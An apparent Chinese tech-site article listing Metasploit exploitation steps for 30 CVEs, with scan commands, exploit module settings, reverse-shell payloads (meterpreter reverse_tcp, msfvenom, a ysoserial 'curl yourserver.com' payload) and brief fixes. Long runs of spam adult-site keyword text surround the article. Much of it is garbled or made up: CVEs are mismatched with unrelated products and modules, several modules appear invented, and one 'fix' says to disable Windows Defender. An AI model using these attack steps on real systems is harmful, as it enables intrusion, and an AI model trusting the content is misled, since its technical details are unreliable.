精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

msf提權漏洞利用總結

原創 精選
人工智能
最近在重構安全體系,順帶對msf可以利用的漏洞進行了一些總結,快來看看吧。

圖片

1.CVE-2019-19781 Citrix漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap或Metasploit的citrix_enum模塊進行掃描。

# 使用Nmap掃描
nmap -p 80,443 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/citrix_enum
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的citrix_adc_cve_2019_19781模塊進行利用。

use exploit/linux/http/citrix_adc_cve_2019_19781
set RPORT 443
set TARGETURI /vpn/
set USERNAME <username>
set PASSWORD <password>

(3)詳細的修復辦法:

下載v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway軟件更新,或禁用易受攻擊的目錄遍歷服務URL路徑。

2.CVE-2019-11510 Pulse Secure VPN漏洞

(1)使用Nmap掃描目標主機開放的443端口,也可以使用Metasploit的http_pulsesecure_traversal模塊進行掃描。

nmap --script ssl-heartbleed -p 443 <target_IP>
use auxiliary/scanner/http/pulsesecure_traversal

(2)使用Metasploit的pulsesecure_cmd_exec模塊進行利用。

use exploit/linux/http/pulsesecure_cmd_exec
set SSL true
set TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl

(3)漏洞修復

使用Pulse Secure發布的最新軟件更新修補此漏洞,還需同時修改密碼和密鑰,以增強安全性。

3.CVE-2020-5902 F5 BIG-IP漏洞

(1)使用Nmap掃描目標主機開放的443端口,也可以使用Metasploit的http_f5_bigip_check模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2020-5902 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/http_f5_bigip_check
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的f5_bigip_tmsh_rce模塊進行利用。

use exploit/unix/http/f5_bigip_tmsh_rce
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /tmsh/tmshCmd.jsp
run

(3)詳細的修復辦法:

立即升級到最新版本的BIG-IP軟件,最新版本中包含了對此漏洞的修補。

4.CVE-2021-21972 VMware vSphere Client漏洞

(1)使用Nmap掃描目標主機,檢查TCP 443端口是否開放。也可以使用Metasploit的vmware_vcenter_login模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-22986 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/f5_bigip_cookie
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的f5_bigip_restapi_rce模塊進行利用。

use exploit/linux/http/f5_bigip_restapi_rce
set RHOSTS <target_IP>
set TARGETURI /mgmt/tm/util/bash
set PASSWORD <password>
set USERNAME <username>
run

(3)詳細的修復辦法:

立即升級F5 BIG-IP軟件的最新版本,另外,管理員還要加強密碼策略和網絡安全設置。

5.CVE-2021-26855 Exchange漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機,檢查TCP 443端口是否開放。也可以使用Metasploit的http_enum模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/http_enum
set RHOSTS <target_IP>
set RPORT 443
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的microsoft_exchange_server_proxylogon模塊進行利用。

use exploit/windows/http/microsoft_exchange_server_proxylogon
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

(3)詳細的修復辦法:

立即升級Exchange軟件的最新版本,或使用Microsoft發布的補丁來修復此漏洞。

6.CVE-2020-1472 ZeroLogon漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機開放的SMB服務端口,如果開放了445或139端口,則可能存在此漏洞。也可以使用Metasploit中的smb_version模塊進行掃描。

# 使用Nmap掃描
nmap -p 445,139 --script smb-vuln-ms17-010 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/smb/smb_version
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的cve_2020_1472_zerologon模塊進行利用。

use exploit/windows/smb/cve_2020_1472_zerologon
set RHOSTS <target_IP>
set SMBDomain <domain_name>
set SMBUser <username>
set SMBPass <password>
run

(3)詳細的修復辦法:

使用Microsoft發布的補丁修復此漏洞,或者將DCs升級到最新版本。

7.CVE-2021-34527 PrintNightmare漏洞

(1)漏洞檢測或者掃描方法:

使用PowerShell腳本進行檢測:

Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List

使用Microsoft提供的補丁測試工具進行漏洞檢測:

# Windows Server 2019/Windows 10 Version 1809 or later
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll
# Windows Server 2012/Windows 8 through earlier versions
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll -VerifySignature 0

(2)漏洞詳細利用方法及步驟參考:

使用PowerShell腳本進行利用:

$code = @'
using System;
using System.Runtime.InteropServices;

public class HelloWorld {
   public static void Main() {
       string cmd = "calc.exe";
       NativeMethods.WinExec(cmd, 0);
   }
}

internal static class NativeMethods {
   [DllImport("kernel32")]
   public static extern int WinExec(string cmd, int nCmdShow);
}
'@
Add-Type $code
[HelloWorld]::Main()

使用Metasploit的windows/local/ntprint_smb模塊進行利用:

use exploit/windows/local/ntprint_smb
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attack_IP>
set RHOSTS <target_IP>
run

(3)詳細的修復辦法:

Microsoft已經發布了安全更新程序,建議用戶盡快升級到最新版并關閉Windows打印機共享服務。此外,也可以通過策略或命令行的方式禁用Windows打印機共享服務,或者限制用戶對打印機共享的訪問來減少攻擊面。

8.CVE-2021-21985 vSphere Client漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_upload_file模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21985 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_upload_file
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的vmware_vcenter_server_rce模塊進行利用。

use exploit/linux/http/vmware_vcenter_server_rce
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
run

(3)詳細的修復辦法:

VMware官方發布了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程序來修復此漏洞,管理員可以下載并安裝最新版本的軟件來修補此漏洞。

9.CVE-2021-31166 IIS漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機的HTTP服務,也可以使用Metasploit的http_iis_webdav_upload_asp模塊進行掃描。

# 使用Nmap掃描
nmap -p80 --script http-vuln-cve2021-31166 <target_IP>
# 使用Metasploit模塊
use exploit/windows/http/iis_webdav_upload_asp
set RHOSTS <target_IP>
set RPORT 80
set SSL false
set TARGETURI /webdav/test.txt
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的http_iis_webdav_payload模塊進行利用。

use exploit/windows/http/iis_webdav_payload
set RHOSTS <target_IP>
set VHOST <host_header>
set LHOST <local_IP>
run

(3)詳細的修復辦法:

下載并安裝最新版本的IIS軟件更新來修補此漏洞,或者在服務器上禁用WebDAV協議。

10.CVE-2021-1636 Windows Defender漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否開放了Windows Defender的遠程管理端口5985,也可以使用Metasploit的windows/local/ms-windefender-bypass模塊進行掃描。

# 使用Nmap掃描
nmap -p 5985 <target_IP>
# 使用Metasploit模塊
use exploit/windows/local/ms-windefender-bypass
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的windows/local/ms-windefender-bypass-exe模塊進行利用。

use exploit/windows/local/ms-windefender-bypass-exe
set LHOST <local_IP>
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

(3)詳細的修復辦法:

立即安裝微軟發布的最新累積更新,或者手動禁用Windows Defender。

11.CVE-2021-22893 Fortinet SSL VPN漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否開放了Fortinet SSL VPN的HTTPS服務,也可以使用Metasploit的http_fortinet_upload_exec模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/fortinet_upload_exec
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的fortinet_sslvpn_webauth_form_cmd_exec模塊進行利用。

use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_exec
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /remote/login?lang=en
set SSL true
run

(3)詳細的修復辦法:

將Fortinet SSL VPN升級到最新版本并檢查配置是否正確,確保安裝了所有推薦的組件和補丁。

12.CVE-2021-21972 vSphere Client漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21972模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21972 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的vmware_vcenter_js_fckeditor模塊進行利用。

use exploit/linux/http/vmware_vcenter_js_fckeditor
set RHOSTS <target_IP>
set TARGETURI /fckeditor/editor/filemanager/connectors/test.html
run

(3)詳細的修復辦法:

立即升級vCenter Server,vSphere Client和ESXi軟件,或者使用VMware發布的補丁并重新部署系統。

13.CVE-2021-21979 vCenter Server漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21979模塊進行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21979 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的vmware_vcenter_server_appliance_rce模塊進行利用。

use exploit/linux/http/vmware_vcenter_server_appliance_rce
set RHOSTS <target_IP>
set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileCnotallow=1?path=/var/log/vmware/vsan-health/*
run

(3)詳細的修復辦法:

下載并安裝VMware發布的最新版本的軟件更新,或者使用VMware發布的補丁修復此漏洞。

14.CVE-2021-22879 SonicWall VPN漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否開放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest模塊進行掃描。

# 使用Nmap掃描
nmap -p 443,8443 --script http-vuln-cve2021-20016 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/sonicwall_sslvpntest
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的sonicwall_netextender_rce模塊進行利用。

use exploit/linux/http/sonicwall_netextender_rce
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run

(3)詳細的修復辦法:

下載并安裝最新版本的SonicWall NetExtender客戶端,或者升級到最新版本的SonicWall SMA和Firewall軟件。

15.CVE-2017-0144 EternalBlue漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap進行端口掃描,或使用Metasploit的ms17_010_eternalblue模塊進行掃描。

使用Nmap掃描

nmap -sV --script smb-vuln-ms17-010 <target_IP>

使用Metasploit模塊

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的windows/shell/reverse_tcp模塊進行反向Shell連接。

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST <local_IP>
set LPORT <local_port>
run

(3)詳細的修復辦法:

立即安裝微軟發布的最新安全更新或累積更新,或禁用不必要的SMBv1協議。

16.CVE-2019-18935 Citrix ADC漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否存在Citrix ADC,或使用Citrix提供的cxcheck.c腳本進行單個主機掃描。

使用Nmap掃描

nmap -p 80,443 <target_IP>

使用cxcheck.c腳本進行單個主機掃描

gcc cxcheck.c -lpthread -o cxcheck
./cxcheck <target_IP>

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的citrix_adc_cve_2019_19781_directory_traversal模塊進行利用。

use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversal
set RHOSTS <target_IP>
set SRVHOST <local_IP>
run

(3)詳細的修復辦法:

下載并安裝Citrix發布的安全更新補丁,或通過網絡隔離等措施進行防范。

17.CVE-2020-14750 Oracle WebLogic Server漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目標主機是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec模塊進行掃描。

使用Nmap掃描

nmap -p 7001,7002 --script=oracle-tns-version <target_IP>

使用Metasploit模塊

use exploit/multi/http/weblogic_ssrf
set RHOSTS <target_IP>
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/weblogic_ssrf_advise_poc模塊進行利用。

use exploit/multi/http/weblogic_ssrf_advise_poc
set RHOSTS <target_IP>
run

(3)詳細的修復辦法:

下載并安裝Oracle發布的最新安全更新補丁,或通過網絡隔離等措施進行防范,如配置WebLogic防火墻、禁用未使用的組件等措施。同時,建議實現強身份驗證,并將系統域名與其他軟件綁定在一起以保護WebLogic服務器,避免利用URL入侵漏洞。

18.CVE-2020-0796 SMBv3 Ghost漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap進行端口掃描,或使用Metasploit的smb2_compression_zero模塊進行掃描。

使用Nmap掃描

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796 <target_IP>

使用Metasploit模塊

use auxiliary/scanner/smb/smb2_compression_zero
set RHOSTS <target_IP>
set RPORT 445
run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的windows/smb/smbv3_client_reliable_dialect_leak模塊進行利用。

use exploit/windows/smb/smbv3_client_reliable_dialect_leak
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run

(3)詳細的修復辦法:

盡快安裝微軟發布的補丁,禁用不必要的SMBv3協議或進行防火墻限制,以及限制網絡流量從外部接入。

19.Shiro反序列化漏洞(CVE-2020-13933)

(1)漏洞檢測或掃描方法:

使用ysoserial工具生成payload,發送到目標Shiro服務器并觀察是否觸發了漏洞。

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base64

發送payload到目標服務器并觀察是否觸發漏洞

(2)漏洞詳細利用方法及步驟參考:

使用msfvenom生成payload,然后使用Metasploit的multi/http/shiro_default_password_exec模塊進行利用。

使用msfvenom生成payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -o payload.bin

使用Metasploit的模塊進行攻擊

use exploit/multi/http/shiro_default_password_exec
set RHOSTS <target_IP>
set TARGETURI /xxx
set PAYLOADFILE payload.bin
run

(3)詳細的修復辦法:

升級Apache Shiro版本,禁止使用未授權的功能。

20.Struts2-032遠程代碼執行漏洞(CVE-2016-3087)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"
struts-pwn:https://github.com/mazen160/struts-pwn

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_code_exec_showcase模塊進行利用。

use exploit/multi/http/struts2_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數據。

21.Struts2-045遠程代碼執行漏洞(CVE-2017-5638)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl模塊進行利用。

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,限制上傳文件類型,加強日志監控。

22.Struts2-053遠程代碼執行漏洞(CVE-2017-5638)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>

使用Struts2-Scan腳本

python struts-pwn_CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"
Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl模塊進行利用。

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,限制上傳文件類型,加強日志監控。

23.Struts2-061遠程代碼執行漏洞(CVE-2020-17530)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2020-17530 <target_IP>

使用Struts2-Scan腳本

python3 Struts2_061_scanner.py -u http://<target_IP>/ -c "touch hack.txt"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/linux/http/struts2_namespace_ognl模塊進行利用。

use exploit/linux/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,加強輸入校驗和過濾,限制系統命名空間。

24.Struts2-016遠程代碼執行漏洞(CVE-2013-2251)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2013-2251.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_code_exec_class模塊進行利用。

use exploit/multi/http/struts_code_exec_class
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/example/HelloWorld.action
set CMD <command_to_execute>
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,限制訪問權限和用戶輸入數據,加強異常處理。

25.Struts2-037遠程代碼執行漏洞(CVE-2016-3081)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_dmi_exec模塊進行利用。

use exploit/multi/http/struts_dmi_exec
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數據。此漏洞也可以通過在web.xml文件中配置一個安全過濾器來修復。

26.Struts2-052遠程代碼執行漏洞(CVE-2017-9805)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2017-9805.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_rest_xstream模塊進行利用。

use exploit/multi/http/struts2_rest_xstream
set RHOSTS <target_IP>
set TARGETURI /struts2-rest-showcase/orders/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數據,限制訪問權限。此漏洞也可以通過在web.xml文件中配置一個安全過濾器來修復。

27.Struts2-013遠程命令執行漏洞(CVE-2013-1966)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_exec_namespace_ognl模塊進行利用。

use exploit/multi/http/struts_exec_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,限制訪問權限和用戶輸入數據,加強異常處理。同時,建議在web.xml文件中配置一個安全過濾器來緩解此漏洞的影響。

28.Struts2-033遠程命令執行漏洞(CVE-2016-3081)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_code_exec_showcase模塊進行利用。

use exploit/multi/http/struts_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,加強用戶輸入數據的過濾和異常處理,限制訪問權限。另外,建議在web.xml文件中配置安全過濾器來緩解此漏洞的影響。

29.Struts2-057遠程代碼執行漏洞(CVE-2018-11776)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2018-11776.py -u http://<target_IP>/index.action

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_namespace_ognl模塊進行利用。

use exploit/multi/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,加強用戶輸入數據的過濾和異常處理,限制訪問權限。另外,建議在web.xml文件中配置安全過濾器來緩解此漏洞的影響。

30.Struts2-devmode遠程代碼執行漏洞

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-devmode.py -u http://<target_IP>/struts2-showcase/ -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_dev_mode模塊進行利用。

use exploit/multi/http/struts2_dev_mode
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細的修復辦法:

升級至最新版本的Struts2,加強用戶輸入數據的過濾和異常處理,限制訪問權限。另外,建議關閉devMode或限制只有特定IP地址能夠訪問。

責任編輯:龐桂玉 來源: 51CTO
相關推薦

2019-12-01 22:34:42

提權web安全漏洞

2022-03-10 09:41:15

漏洞Linux內核

2016-05-17 09:42:16

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2017-04-07 09:46:16

2015-03-13 10:06:55

2020-11-16 10:55:41

Windows

2010-12-10 15:23:49

Linux漏洞

2020-10-06 13:58:25

漏洞

2009-07-25 16:52:29

2025-11-13 09:39:01

2012-11-21 14:39:34

2023-10-09 18:22:35

2018-06-21 14:50:00

2009-04-24 14:08:25

2009-04-24 14:34:51

2021-01-30 18:31:00

sudo緩存溢出漏洞

2011-03-07 11:36:23

FileZillaSe

2023-03-30 09:53:57

點贊
收藏

51CTO技術棧公眾號

在线亚洲高清视频| av午夜精品一区二区三区| 日韩中文字幕网站| 成年人网站av| 密臀av在线播放| 久久综合一区二区| 亚洲aa中文字幕| 国产综合精品视频| 亚洲激情中文| 亚洲欧美成人在线| 中文字幕精品一区二区三区在线| 国产探花在线观看| 中文字幕一区在线观看视频| 国产精品免费区二区三区观看| 日韩精品成人免费观看视频| 亚洲视频电影在线| 一区二区三区国产在线观看| 91精品人妻一区二区三区蜜桃2| 我爱我色成人网| 亚洲激情图片qvod| 日本一区二区在线视频观看| 亚洲国产www| 开心九九激情九九欧美日韩精美视频电影 | 国产毛片在线视频| 久久久噜噜噜| 久久噜噜噜精品国产亚洲综合| 九九热久久免费视频| 天堂av一区二区三区在线播放| 制服丝袜av成人在线看| 少妇高清精品毛片在线视频| av免费在线视| 最新国产成人在线观看| 日韩性感在线| 青青草手机在线| 成人看片黄a免费看在线| 成人国产精品色哟哟| 无码人妻av免费一区二区三区| 亚洲一级二级| 欧美大片网站在线观看| 欧美大片xxxx| 欧美h版在线| 亚洲欧美综合v| 添女人荫蒂视频| 久久大胆人体视频| 欧美成人精精品一区二区频| 手机在线国产视频| 全球中文成人在线| 91成人免费网站| 女性隐私黄www网站视频| av资源在线播放| 欧美日韩国产影院| 免费无码毛片一区二三区| 青青草原av在线| 亚洲综合久久久| 97超碰在线人人| av手机在线观看| 欧美日韩在线免费观看| 大j8黑人w巨大888a片| 6699嫩草久久久精品影院| 亚洲午夜成aⅴ人片| 国产手机免费视频| 99久久精品免费看国产小宝寻花| 中文字幕中文字幕一区| 中文字幕日韩一区二区三区 | 亚洲国产精品99久久久久久久久| 日本日本精品二区免费| 超碰在线影院| 国产精品乱子久久久久| 亚洲一区在线直播| 国产黄色在线免费观看| 一区二区高清视频在线观看| www.av91| a日韩av网址| 欧美婷婷六月丁香综合色| 嫩草视频免费在线观看| 一区二区三区视频播放| 亚洲大胆美女视频| 国产熟妇久久777777| 欧洲杯半决赛直播| 久久天天躁狠狠躁老女人| 国产一级特黄a高潮片| 在线亚洲一区| 国产精品入口免费视| 国产精品一级视频| 99热精品国产| 亚洲国产精品一区二区第一页| 成人在线免费看黄| 欧美视频在线观看免费| the porn av| 97一区二区国产好的精华液| 国产丝袜精品第一页| 999精品久久久| 在线日韩欧美| 国产日韩欧美91| 嫩草影院一区二区| 国产欧美日韩视频一区二区| 蜜臀av性久久久久蜜臀av| 极品视频在线| 欧美一区二区三区四区久久| 日本xxx在线播放| 久久一区91| 97精品一区二区视频在线观看| 午夜视频网站在线观看| 岛国精品在线观看| 亚洲精品人成| 美女高潮视频在线看| 91精品在线观看入口| 青青草视频成人| 在线中文字幕第一区| 日韩av电影在线网| 国产特级aaaaaa大片| 久久精品人人做人人综合 | 蜜桃av在线播放| 91精品国产色综合久久不卡蜜臀 | 亚洲一区二区蜜桃| 白嫩白嫩国产精品| 日韩在线视频网站| 久久久成人免费视频| 成人精品鲁一区一区二区| 日韩欧美视频第二区| aa国产成人| 精品国产一区二区三区久久久蜜月| 黄色三级生活片| 亚洲免费综合| 韩国成人一区| 三级资源在线| 在线不卡a资源高清| 欧美激情亚洲色图| 麻豆精品91| 久久久一本精品99久久精品| 欧美1234区| 91麻豆精品国产91久久久资源速度| 亚洲码无人客一区二区三区| 国产视频一区欧美| 国产精品区免费视频| 污视频在线看网站| 91精品国产色综合久久不卡蜜臀| 欧美性生交大片| 免费精品99久久国产综合精品| 欧美日韩国产综合在线| 一本大道色婷婷在线| 日韩激情视频在线播放| 国产污视频在线看| 成人性生交大片免费看中文网站| 国内自拍中文字幕| 一区二区三区在线免费看| 欧美xxxx做受欧美| 国产高清视频免费观看| 亚洲人被黑人高潮完整版| 亚洲一区二区中文字幕在线观看| 999久久久91| 91九色视频在线| av官网在线播放| 日韩亚洲欧美高清| 久久久国产精品人人片| 成人自拍视频在线观看| 久久av综合网| 妖精一区二区三区精品视频| 日本欧美爱爱爱| 成人综合影院| 欧美一区二区高清| 538任你躁在线精品视频网站| 国产99久久久国产精品潘金| 久久国产精品网| 亚洲小说图片视频| 国产精品福利在线观看网址| 在线免费观看黄色av| 91精品国产欧美一区二区成人| 欧美成人精品欧美一级| av福利精品导航| 成人免费观看视频在线观看| 精品日韩毛片| 亚洲专区中文字幕| 老牛影视精品| 色偷偷偷亚洲综合网另类| 99国产精品一区二区三区 | 色偷偷av亚洲男人的天堂| a在线观看视频| 岛国av一区二区| 鲁丝一区二区三区| 国产乱子伦一区二区三区国色天香| 污污污污污污www网站免费| 欧美日韩导航| 国产欧美日韩中文字幕| 国产网红在线观看| 国产一区二区三区精品久久久| 国产麻豆一精品一男同| 午夜亚洲国产au精品一区二区| 成人在线一级片| 国产裸体歌舞团一区二区| 女人天堂av手机在线| 色天天久久综合婷婷女18| 国产精品国产精品| 激情亚洲小说| 2021久久精品国产99国产精品| 97视频在线观看网站| 亚洲第一中文字幕在线观看| 中文在线字幕免费观| 亚洲一区二区三区小说| 欧美日韩国产黄色| www.99精品| 天堂网成人在线| 天堂va蜜桃一区二区三区漫画版| 日韩人妻一区二区三区蜜桃视频| 一本久久青青| 国产高清一区视频| 91麻豆精品国产综合久久久 | 亚洲欧美一二三区| 一区二区三区在线观看动漫| 国产人妻一区二区| 成人免费视频caoporn| 天天综合网日韩| 欧美专区18| 国产精品videossex国产高清| 日本一二区不卡| 久久精品日韩| 9国产精品午夜| 亚洲字幕一区二区| 欧美黄色成人| 国产999在线| 